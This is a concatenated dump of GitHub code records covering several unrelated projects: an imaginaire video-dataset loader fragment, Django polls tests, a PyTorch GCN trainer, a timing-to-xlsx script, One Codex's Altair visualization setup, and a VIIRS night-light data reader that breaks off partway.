lmdb_idx = keys['lmdb_idx']\n sequence_name = keys['sequence_name']\n filenames = keys['filenames']\n\n # Get key and lmdbs.\n keys, lmdbs = {}, {}\n for data_type in self.dataset_data_types:\n keys[data_type] = self._create_sequence_keys(\n sequence_name, filenames)\n lmdbs[data_type] = self.lmdbs[data_type][lmdb_idx]\n\n # Load all data for this index.\n data = self.load_from_dataset(keys, lmdbs)\n\n # Apply ops pre augmentation.\n data = self.apply_ops(data, self.pre_aug_ops)\n\n # If multiple subjects exist in the data, only pick one to synthesize.\n data = select_object(data, obj_indices=None)\n\n # Do augmentations for images.\n data, is_flipped = self.perform_augmentation(data, paired=True, augment_ops=self.augmentor.augment_ops)\n\n # Apply ops post augmentation.\n data = self.apply_ops(data, self.post_aug_ops)\n data = self.apply_ops(data, self.full_data_post_aug_ops, full_data=True)\n\n # Convert images to tensor.\n data = self.to_tensor(data)\n\n # Pack the sequence of images.\n for data_type in self.image_data_types + self.hdr_image_data_types:\n for idx in range(len(data[data_type])):\n data[data_type][idx] = data[data_type][idx].unsqueeze(0)\n data[data_type] = torch.cat(data[data_type], dim=0)\n\n if not self.is_video_dataset:\n # Remove any extra dimensions.\n for data_type in self.data_types:\n if data_type in data:\n data[data_type] = data[data_type].squeeze(0)\n\n data['is_flipped'] = is_flipped\n data['key'] = keys\n data['original_h_w'] = torch.IntTensor([\n self.augmentor.original_h, self.augmentor.original_w])\n\n # Apply full data ops.\n data = self.apply_ops(data, self.full_data_ops, full_data=True)\n\n return data\n\n def __getitem__(self, index):\n return self._getitem(index)\n","repo_name":"NVlabs/imaginaire","sub_path":"imaginaire/datasets/paired_videos.py","file_name":"paired_videos.py","file_ext":"py","file_size_in_byte":10968,"program_lang":"python","lang":"en","doc_type":"code","stars":3891,"dataset":"github-code","pt":"81"} +{"seq_id":"21454414514","text":"import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Question\n\n# tutorial05\nfrom django.urls import reverse\n\n################################\n# For more info on all the asserts available in django.test.Testcase,\n# $ python 
manage.py shell\n# >>> from django.test import TestCase\n# >>> dir(TestCase())\n###############################\n\n# Running tests does not affect our actual database:\n# Creating test database for alias 'default'...\n# [...]\n# Destroying test database for alias 'default'...\n\n\n\n# tutorial05\n# Test methods must reside within a class that is a subclass\n# of django.test.TestCase; and must begin with keyword 'test'\n# \n# Here we have created a django.test.TestCase subclass.\n#\n# To run tests:\n# $ python manage.py test polls\n#\n# What happened is this:\n# - manage.py test polls looked for tests in the polls application\n# - it found a subclass of the django.test.TestCase class\n# - it created a special database for the purpose of testing\n# - it looked for test methods - ones whose names begin with test\n# - in test_was_published_recently_with_future_question it created a Question instance\n# whose pub_date field is 30 days in the future\n# ...and using the assertIs() method, it discovered that its was_published_recently()\n# returns True, though we wanted it to return False\n# The test informs us which test failed and even the line on which the failure occurred.\nclass QuestionModelTests(TestCase):\n\n # This test creates a Question instance with a pub_date in the future.\n # We then check the output of\n # was_published_recently() - which ought to be False.\n def test_was_published_recently_with_future_question(self):\n \"\"\"\n was_published_recently() returns False for questions whose pub_date\n is in the future.\n \"\"\"\n #print (\"test1\")\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n # Additional test case: older pub date\n def test_was_published_recently_with_old_question(self):\n \"\"\"\n was_published_recently() returns False for questions whose pub_date\n is older than 1 day.\n \"\"\"\n #print (\"test2\")\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n\n # Additional test case: recent pub date\n def test_was_published_recently_with_recent_question(self):\n \"\"\"\n was_published_recently() returns True for questions whose pub_date\n is within the last day (23 hrs + 59 min + 59 sec).\n \"\"\"\n #print (\"test3\")\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n######################\n# tutorial05\n# Testing our new index view (updated IndexView class in polls/views.py)\n\n# Helper function for our new test cases\n# *NOTE*: Any questions created here will not be committed to our database.\n# \"The database is reset for each test method, so the first question is no\n# longer there, and so again the index shouldn’t have any questions in it.\"\ndef create_question(question_text, days):\n \"\"\"\n Create a question with the given `question_text` and published the\n given number of `days` offset to now (negative for questions published\n in the past, positive for questions that have yet to be published).\n \"\"\"\n time = timezone.now() + datetime.timedelta(days=days)\n return Question.objects.create(question_text=question_text, pub_date=time)\n\n\nclass QuestionIndexViewTests(TestCase):\n def test_no_questions(self):\n \"\"\"\n If no questions exist, an appropriate message is displayed.\n \"\"\"\n 
response = self.client.get(reverse('polls:index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"No polls are available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_past_question(self):\n \"\"\"\n Questions with a pub_date in the past are displayed on the\n index page.\n \"\"\"\n create_question(question_text=\"Past question.\", days=-30)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['']\n )\n\n def test_future_question(self):\n \"\"\"\n Questions with a pub_date in the future aren't displayed on\n the index page.\n \"\"\"\n create_question(question_text=\"Future question.\", days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertContains(response, \"No polls are available.\")\n self.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n def test_future_question_and_past_question(self):\n \"\"\"\n Even if both past and future questions exist, only past questions\n are displayed.\n \"\"\"\n create_question(question_text=\"Past question.\", days=-30)\n create_question(question_text=\"Future question.\", days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['']\n )\n\n def test_two_past_questions(self):\n \"\"\"\n The questions index page may display multiple questions.\n \"\"\"\n create_question(question_text=\"Past question 1.\", days=-30)\n create_question(question_text=\"Past question 2.\", days=-5)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['', '']\n )\n\n\n######################\n# tutorial05\n# Testing our new detail view (updated DetailView class in polls/views.py)\nclass QuestionDetailViewTests(TestCase):\n def test_future_question(self):\n \"\"\"\n The detail view of a question with a pub_date in the future\n returns a 404 not found.\n \"\"\"\n future_question = create_question(question_text='Future question.', days=5)\n url = reverse('polls:detail', args=(future_question.id,))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_past_question(self):\n \"\"\"\n The detail view of a question with a pub_date in the past\n displays the question's text.\n \"\"\"\n past_question = create_question(question_text='Past Question.', days=-5)\n url = reverse('polls:detail', args=(past_question.id,))\n response = self.client.get(url)\n self.assertContains(response, past_question.question_text)\n\n\n\n","repo_name":"jeffb4real/ovensensorweb","sub_path":"mysite/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10372338124","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport math\n\nimport numpy as np\nimport scipy.sparse as sp\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.nn.parameter import Parameter\n\n\nclass GCN(nn.Module):\n # dropout_rate = 0.2\n\n def __init__(self, n_in, n_out, dropout_rate=None):\n super(GCN, self).__init__()\n self.graph1 = GraphConvolution(n_in, n_out)\n self.dropout_rate = dropout_rate\n\n def forward(self, x, adj):\n # adj是邻接矩阵\n out = F.relu(self.graph1(x, adj), inplace=True)\n if self.dropout_rate is not None:\n 
return F.dropout(out, self.dropout_rate, training=self.training)\n else:\n return out\n\n\nclass GraphConvolution(nn.Module):\n \"\"\"\n 使用pytorch实现的图卷积层\n \"\"\"\n def __init__(self, n_in, n_out, bias=True):\n super(GraphConvolution, self).__init__()\n self.in_features = n_in\n self.out_features = n_out\n # 建立边权重\n self.weight = Parameter(torch.FloatTensor(n_in, n_out))\n if bias:\n self.bias = Parameter(torch.FloatTensor(n_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv)\n\n def forward(self, input, adj):\n \"\"\"\n 前向传播\n :param input: 输入数据\n :param adj: 邻接矩阵\n :return:\n \"\"\"\n # 两个矩阵相乘\n support = torch.mm(input, self.weight)\n # 左乘标准化的邻接矩阵\n # 于邻接矩阵的存储时用的是稀疏矩阵,所以有别于上一行\n # torch.spmm表示sparse_tensor与dense_tensor相乘。\n output = torch.spmm(adj, support)\n if self.bias is not None:\n return output + self.bias\n else:\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\ndef encode_onehot(labels):\n \"\"\"onehot编码,将每个类别转成一个向量\"\"\"\n classes = set(labels)\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in\n enumerate(classes)}\n labels_onehot = np.array(list(map(classes_dict.get, labels)),\n dtype=np.int32)\n return labels_onehot\n\n\ndef normalize(mx):\n \"\"\"Row-normalize sparse matrix\"\"\"\n rowsum = np.array(mx.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n mx = r_mat_inv.dot(mx)\n return mx\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)\n\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False,\n help='Validate during training pass.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200,\n help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=16,\n help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n help='Dropout rate (1 - keep probability).')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n\n# def load_data(path=\"../data/cora/\", dataset=\"cora\"):\ndef load_data(path=\"sample_data/cora/\", dataset=\"cora\"):\n \"\"\"\n 加载数据\n :param path: 数据的路径\n :param dataset: 数据集名\n :return:\n \"\"\"\n 
\"\"\"Load citation network dataset (cora only for now)\"\"\"\n print('Loading {} dataset...'.format(dataset))\n # 解析数据\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n # 从第2列到倒数第二列是特征数据\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n # 最后一列是标签数据\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # 索引数据\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n # 保存数据的索引,key是数据id,value是原数据中的位置(从0开始)。\n idx_map = {j: i for i, j in enumerate(idx)}\n # 加载数据\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n # 将数据压平,根据id找到对应的索引的位置\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n # 正规化特征数据\n features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1])\n # 将邻接矩阵转换为稀疏矩阵\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test\n\n\n# 加载数据\nadj, features, labels, idx_train, idx_val, idx_test = load_data()\n\n# 建立模型\nmodel = GCN(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=labels.max().item() + 1,\n dropout=args.dropout)\n# GCN的损失函数分为两部分,一部分是分类损失,一部分是权重的正则化。\noptimizer = optim.Adam(model.parameters(),\n lr=args.lr, weight_decay=args.weight_decay)\n\nif args.cuda:\n model.cuda()\n features = features.cuda()\n adj = adj.cuda()\n labels = labels.cuda()\n idx_train = idx_train.cuda()\n idx_val = idx_val.cuda()\n idx_test = idx_test.cuda()\n\n\ndef train(epoch):\n t = time.time()\n model.train()\n optimizer.zero_grad()\n # 将特征和邻接矩阵输入网络,得到输出的数据\n output = model(features, adj)\n # 计算损失\n loss_train = F.nll_loss(output[idx_train], labels[idx_train])\n # 计算正确率\n acc_train = accuracy(output[idx_train], labels[idx_train])\n # 反向传播\n loss_train.backward()\n optimizer.step()\n\n if not args.fastmode:\n # 进入评估模式\n model.eval()\n output = model(features, adj)\n\n loss_val = F.nll_loss(output[idx_val], labels[idx_val])\n acc_val = accuracy(output[idx_val], labels[idx_val])\n print('Epoch: {:04d}'.format(epoch + 1),\n 'loss_train: {:.4f}'.format(loss_train.item()),\n 'acc_train: {:.4f}'.format(acc_train.item()),\n 'loss_val: {:.4f}'.format(loss_val.item()),\n 'acc_val: {:.4f}'.format(acc_val.item()),\n 'time: {:.4f}s'.format(time.time() - t))\n\n\ndef test():\n \"\"\"测试数据\"\"\"\n model.eval()\n output = model(features, adj)\n loss_test = F.nll_loss(output[idx_test], labels[idx_test])\n acc_test = accuracy(output[idx_test], labels[idx_test])\n print(\"Test set results:\",\n \"loss= {:.4f}\".format(loss_test.item()),\n \"accuracy= {:.4f}\".format(acc_test.item()))\n\n\nimport time\n\nt_total = time.time()\nfor epoch in range(args.epochs):\n train(epoch)\nprint(\"Optimization Finished!\")\nprint(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n\n# 
Testing\ntest()\n","repo_name":"strawsyz/straw","sub_path":"my_cv/famous_netorks/GCN_pytorch/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"35920989898","text":"from openpyxl import Workbook\nimport argparse, string\n\ng_input_list = None\ng_output_path = None\ng_dry = False\ng_verbose = False\ndef getInputPath(l):\n\tglobal g_input_list\n\tg_input_list = l\n\ndef getOutputPath(path):\n\tglobal g_output_path\n\tg_output_path = path\n\nLABEL = {\n\t'Alternative': ['result/time(s)', 'input', 'Character Table Creation', 'sorting time', 'output', 'totoal', 'sort/total'],\n\t'Iterator': ['result/time(s)','input', 'sorting time', 'output', 'total', 'sort/total'],\n\t'Simple': ['result/time(s)','input', 'sorting time', 'output', 'total', 'sort/total']\n}\n\nCH = string.ascii_uppercase\n\ndef POS(i, j):\n\treturn CH[j] + str(i+1)\n\ndef createSheetLabel(st, name):\n\tname = name.split('_')[0]\n\tfor i in range(len(LABEL[name])):\n\t\tst[POS(0, i+1)] = LABEL[name][i]\n\nMAP = {}\ndef getMapAlpha(mm):\n\twith open('map_the_alpht.txt', 'r') as map_the_alpht_fp:\n\t\tlines = [x.split(': ') for x in map_the_alpht_fp.readlines()]\n\t\tmap_tmp = []\n\t\tfor i in range(18):\n\t\t\tmap_tmp.append(lines[i][1].strip())\n\t\tmm['line'] = map_tmp\n\t\tmap_tmp = []\n\t\tfor i in range(19, 37):\n\t\t\tmap_tmp.append(lines[i][1].strip())\n\t\tmm['len'] = map_tmp\n\n\ng_file_name = {'line': 'data_line.txt', 'len': 'data_len.txt'}\ng_type = ['line', 'len']\ndef process():\n\t'''\n\tprocess the data (line, len) and gen a .xlsx file\n\t'''\n\tgetMapAlpha(MAP)\n\twb = Workbook()\n\twb.remove(wb.active)\n\tfor i in g_input_list:\n\t\tfor j in g_type:\n\t\t\tnow = '{}_{}'.format(i, j)\n\t\t\tprint('Creating sheet {}'.format(now))\n\t\t\t# if dry run, then don't do anything\n\t\t\tif g_dry:\n\t\t\t\tcontinue\n\n\t\t\tsheet = wb.create_sheet(now)\n\t\t\tcreateSheetLabel(sheet, now)\n\n\t\t\ttry:\n\t\t\t\tprint('>> {}'.format(i))\n\t\t\t\twith open('result/' + i + '/' + g_file_name[j], 'r') as f:\n\t\t\t\t\tdata = [x.split() for x in f.readlines()]\n\t\t\t\t\t'''\n\t\t\t\t\tOnly one pop() it's because the label of each data will be spilt into two element\n\t\t\t\t\te.g.(100, 1000) => ['(100', '1000)']\n\t\t\t\t\tThe original implementation has only a aplhabet in the beginning of each line of the data\n\t\t\t\t\t'''\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tdata[ii].pop(0)\n\n\t\t\t\t\t# A ~ R\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tsheet[POS(ii+1, 0)] = CH[ii]\n\t\t\t\t\t# description\n\t\t\t\t\tfor ii in range(len(MAP[j])):\n\t\t\t\t\t\tsheet[POS(ii+1, 1)] = MAP[j][ii]\n\t\t\t\t\t# actual data\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tfor jj in range(1, len(data[ii])):\n\t\t\t\t\t\t\t# print('{} {}'.format(ii, jj))\n\t\t\t\t\t\t\tsheet[POS(ii + 1, jj-1 + 2)] = data[ii][jj]\n\t\t\t\t\t# total\n\t\t\t\t\ttotal_pos = 5\n\t\t\t\t\tpercent_pos = [3, 5]\n\t\t\t\t\tif i == 'Alternative':\n\t\t\t\t\t\ttotal_pos = 6\n\t\t\t\t\t\tpercent_pos = [4, 6]\n\t\t\t\t\ttotal_lines = []\n\n\t\t\t\t\tfor ii in range(len(data)):\n\t\t\t\t\t\tsumm = float(data[ii][1]) + float(data[ii][2]) + float(data[ii][3])\n\t\t\t\t\t\tif i == 'Alternative':\n\t\t\t\t\t\t\tsumm += float(data[ii][4])\n\t\t\t\t\t\ttotal_lines.append(summ)\n\n\t\t\t\t\tfor ii in range(len(total_lines)):\n\t\t\t\t\t\tsheet[POS(ii+1, total_pos)] = total_lines[ii]\n\n\t\t\t\t\t# sort / total\n\t\t\t\t\tfor ii 
in range(len(data)):\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)] = '=' + POS(1+ii, percent_pos[0]) + '/' + POS(1+ii, percent_pos[1])\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)].style = 'Percent'\n\t\t\t\t\t\tsheet[POS(1+ii, total_pos+1)].number_format = '00.00%'\n\n\t\t\t\t\tif g_verbose:\n\t\t\t\t\t\tprint('=== test ===')\n\t\t\t\t\t\tfor row in sheet:\n\t\t\t\t\t\t\tfor cel in row:\n\t\t\t\t\t\t\t\tprint(cel.value, end=' ')\n\t\t\t\t\t\t\tprint()\n\t\t\t\t\t\tprint('============')\n\t\t\texcept FileNotFoundError as e:\n\t\t\t\tprint('Warning: {}'.format(e))\n\t\t\t\tpass\n\n\tif not g_dry:\n\t\tprint(wb.sheetnames)\n\t\twb.save('test.xlsx')\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Process the output time data into xlsx')\n\tparser.add_argument('-o', '--output', metavar='path', help='Set the output path (Default: .)')\n\tparser.add_argument('-i', '--input', metavar='path', help='Set the input data path (Multiple)', nargs='+')\n\tparser.add_argument('--dry', help='Dry run', action='store_true')\n\tparser.add_argument('-V', '--version', action='version', version='%(prog)s 0.0.1')\n\tparser.add_argument('-v', '--verbose', action='store_true', help='Detail output')\n\n\targs = parser.parse_args()\n\n\tflag = True\n\n\tif args.input:\n\t\tgetInputPath(args.input)\n\tif args.output:\n\t\tgetOutputPath(args.output)\n\n\tg_dry = args.dry\n\tg_verbose = args.verbose\n\tif args.input and args.output:\n\t\tprocess()\n\t\tflag = False\n\tif g_verbose:\n\t\tprint('===== test ======')\n\t\tprint('args.dry = {}'.format(args.dry))\n\t\tprint('args.o = {}'.format(args.output))\n\t\tprint('arg.i = {}'.format(args.input))\n\t\tprint()\n\tif flag:\n\t\tparser.print_usage()","repo_name":"roy4801/107_Gernic_Programming","sub_path":"lab01/gen_xlsx.py","file_name":"gen_xlsx.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12387102567","text":"import imp\nimport sys\n\nfrom onecodex.viz._heatmap import VizHeatmapMixin\nfrom onecodex.viz._pca import VizPCAMixin\nfrom onecodex.viz._primitives import dendrogram\nfrom onecodex.viz._metadata import VizMetadataMixin\nfrom onecodex.viz._distance import VizDistanceMixin\nfrom onecodex.viz._bargraph import VizBargraphMixin\nfrom onecodex.viz._functional import VizFunctionalHeatmapMixin\n\n\nOCX_DARK_GREEN = \"#128887\"\n\nDEFAULT_PALETTES = {\n \"ocx\": [\n \"#16347B\",\n \"#0072C7\",\n \"#01ACEC\",\n \"#97E9FC\",\n \"#0A605E\",\n \"#1DA893\",\n \"#3DD8BE\",\n \"#ABEFE2\",\n \"#37257D\",\n \"#9C78E0\",\n \"#CBC0F9\",\n \"#E3DDFF\",\n \"#BC5B00\",\n \"#EB984A\",\n \"#FCE34D\",\n \"#FEF2A3\",\n \"#950303\",\n \"#DD3A3A\",\n \"#FF8D8B\",\n \"#FFD5CB\",\n \"#771354\",\n \"#C13A8B\",\n \"#F28BBF\",\n \"#F9D9E7\",\n ],\n \"tableau10\": [\n \"#4e79a7\",\n \"#f28e2b\",\n \"#e15759\",\n \"#76b7b2\",\n \"#59a14f\",\n \"#edc948\",\n \"#b07aa1\",\n \"#ff9da7\",\n \"#9c755f\",\n \"#bab0ac\",\n ],\n}\n\nVEGAEMBED_OPTIONS = {\n \"mode\": \"vega-lite\",\n \"loader\": {\"target\": \"_blank\", \"http\": {\"credentials\": \"same-origin\"}},\n \"logLevel\": \"error\",\n}\n\n\ndef onecodex_theme():\n onecodex_palette = [\"#ffffcc\", \"#c7e9b4\", \"#7fcdbb\", \"#41b6c4\", \"#2c7fb8\", \"#264153\"]\n\n font_family = \"Fira Sans, Helvetica\"\n\n return {\n \"config\": {\n \"range\": {\n \"heatmap\": list(reversed(onecodex_palette)),\n \"category\": DEFAULT_PALETTES[\"ocx\"],\n \"ramp\": list(reversed(onecodex_palette)),\n },\n \"area\": {\"fill\": 
OCX_DARK_GREEN},\n \"bar\": {\"fill\": OCX_DARK_GREEN},\n \"mark\": {\"color\": OCX_DARK_GREEN},\n \"axis\": {\n \"labelFont\": font_family,\n \"labelFontSize\": 12,\n \"titleFont\": font_family,\n \"titleFontSize\": 12,\n \"grid\": False,\n },\n \"legend\": {\n \"labelFont\": font_family,\n \"labelFontSize\": 12,\n \"titleFont\": font_family,\n \"titleFontSize\": 12,\n },\n \"title\": {\"font\": font_family},\n \"view\": {\"width\": 400, \"height\": 400, \"strokeWidth\": 0},\n \"background\": \"white\",\n }\n }\n\n\ndef configure_onecodex_theme(altair_module=None):\n \"\"\"Configure One Codex Altair theme.\"\"\"\n if altair_module is None:\n try:\n import altair\n\n altair_module = altair\n except ImportError:\n return # noop\n\n altair_module.themes.register(\"onecodex\", onecodex_theme)\n altair_module.themes.enable(\"onecodex\")\n\n # Render using `altair_saver` if installed (report environment only, requires node deps)\n if \"altair_saver\" in altair_module.renderers.names():\n import functools\n import shutil\n import altair_saver.savers._node\n from altair_saver._utils import check_output_with_stderr\n\n # Change `npm bin` to `npm root` for compatibility with npm >=9 (also backwards compatible\n # with npm 8). We are monkeypatching because altair-saver appears to be an unmaintained\n # project. We are pinned at v0.5.0 so this hack should be safe.\n #\n # Function copied and modified from:\n # https://github.com/altair-viz/altair_saver/blob/v0.5.0/altair_saver/savers/_node.py#L15-L24\n #\n # Applied the fix from:\n # https://github.com/altair-viz/altair_saver/pull/116\n #\n # altair-saver is BSD-3-Clause:\n # https://github.com/altair-viz/altair_saver/blob/v0.5.0/LICENSE\n #\n # altair-saver license is included with this software in `licenses/altair-saver.txt`\n @functools.lru_cache(2)\n def npm_bin(global_: bool) -> str:\n \"\"\"Locate the npm binary directory.\"\"\"\n npm = shutil.which(\"npm\")\n if not npm:\n raise altair_saver.savers._node.ExecutableNotFound(\"npm\")\n cmd = [npm, \"root\"]\n if global_:\n cmd.append(\"--global\")\n return check_output_with_stderr(cmd).decode().strip()\n\n altair_saver.savers._node.npm_bin = npm_bin\n\n # Filter out vega-lite warning about boxplots not yet supporting selection (DEV-4237). This\n # can be removed when vega-lite adds selection support to boxplots:\n #\n # - https://github.com/vega/vega-lite/issues/3702\n # - https://github.com/altair-viz/altair/issues/2232\n def stderr_filter(line):\n \"\"\"Return ``True`` if stderr line should be displayed.\"\"\"\n return \"Selection not supported for boxplot yet\" not in line\n\n altair_module.renderers.enable(\n \"altair_saver\",\n fmts=[\"html\", \"svg\"],\n embed_options=VEGAEMBED_OPTIONS,\n vega_cli_options=[\"--loglevel\", \"error\"],\n stderr_filter=stderr_filter,\n )\n else:\n altair_module.renderers.enable(\"html\", embed_options=VEGAEMBED_OPTIONS)\n\n\n# Define an import hook to configure Altair's theme and renderer the first time\n# it is imported. Directly importing and configuring Altair in this subpackage\n# can slow down the API and CLI. An import hook avoids this performance hit by\n# configuring Altair during deferred import in visualization code.\n#\n# Note: this code is currently Python 2/3 compatible by using the `imp`\n# package, which is deprecated in Python 3. 
Consider using `importlib` if this\n# subpackage doesn't need to support Python 2.\n#\n# Based on: https://stackoverflow.com/a/60352956/3776794\nclass _AltairImportHook(object):\n def find_module(self, fullname, path=None):\n if fullname != \"altair\":\n return None\n self.module_info = imp.find_module(fullname, path)\n return self\n\n def load_module(self, fullname):\n \"\"\"Load Altair module and configure its theme and renderer.\"\"\"\n previously_loaded = fullname in sys.modules\n altair = imp.load_module(fullname, *self.module_info)\n\n if not previously_loaded:\n self._configure_altair(altair)\n return altair\n\n def _configure_altair(self, altair):\n configure_onecodex_theme(altair)\n\n\nsys.meta_path = [_AltairImportHook()] + sys.meta_path\n\n__all__ = [\n \"VizPCAMixin\",\n \"VizHeatmapMixin\",\n \"VizMetadataMixin\",\n \"VizDistanceMixin\",\n \"dendrogram\",\n \"VizBargraphMixin\",\n \"VizFunctionalHeatmapMixin\",\n]\n","repo_name":"onecodex/onecodex","sub_path":"onecodex/viz/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"42915102875","text":"import matplotlib.pyplot as plt\nfrom matplotlib import colors, ticker, cm\nimport matplotlib as mpl #Loads map plotting library\nimport numpy as np #Loads functions for array, linear algebra, array operations\nimport glob\nimport gc\nimport datetime\nfrom matplotlib.dates import DayLocator, HourLocator, DateFormatter, drange\n#import json\n\nfiles = glob.glob('/media/Disk3T/Team/dwu/viirs/data/subset_gd/cf/*asc')\n#fname = '/home/di/viirs/data/SVDNB_npp_20151201-20151231_00N060W_vcmcfg_v10_c201601251413.avg_rade9.tif'\nfiles=sorted(files)\n\n#files_cf = glob.glob('/media/Disk3T/Team/dwu/viirs/data/subset_gd/cf/*asc')\n#files_cf=sorted(files_cf)\n\ntime_t=[]\ncf_t=[]\nfor f in files:\n\n\tfname = f\n\tprint(f)\n\n\ttemp=fname.split('_')\n\ttemp1=temp[3]\n\tyear=temp1[2:4]\n\tmon=temp1[4:6]\n\ttime_t.append(year+'/'+mon)\n\t#time='20151201-20151231'\n\tftype='light'\n\t#outpath='/media/Disk3T/Team/dwu/viirs/img/subset_gd/'\n\t#outname=outpath+ftype+'_'+time+'_sub_org.png'\n\n\tfi=open(fname,'r')\n\theader1 = fi.readline()\n\theader2 = fi.readline()\n\theader3 = fi.readline()\n\theader4 = fi.readline()\n\theader5 = fi.readline()\n\n\ttemp = header1.strip()\n\ttemp1 = temp.split()\n\tncols = int(temp1[1])\n\n\ttemp = header2.strip()\n\ttemp1 = temp.split()\n\tnrows = int(temp1[1])\n\n\ttemp = header3.strip()\n\ttemp1 = temp.split()\n\txllcorner = float(temp1[1])\n\n\ttemp = header4.strip()\n\ttemp1 = temp.split()\n\tyllcorner = float(temp1[1])\n\n\ttemp = header5.strip()\n\ttemp1 = temp.split()\n\tcellsize = float(temp1[1])\n\n\txurcorner = xllcorner+(ncols-1)*cellsize\n\tyurcorner = yllcorner+(nrows-1)*cellsize\n\t#lon0=np.arange(xllcorner,xurcorner,cellsize)\n\t#lat0=np.arange(yllcorner,yurcorner,cellsize)\n\tlon0=xllcorner+np.arange(ncols)*cellsize\n\tlat0=yllcorner+np.arange(nrows)*cellsize\n\n\tlat0 = lat0[::-1]\n\n\tlons, lats = np.meshgrid(lon0, lat0)\n\n\tdata=[]\n\n\ti = 0\n\tfor line in fi:\n\t\ti = i+1\n\t\tline = line.strip()\n\t\tcolumns = line.split()\n\t\tsource = 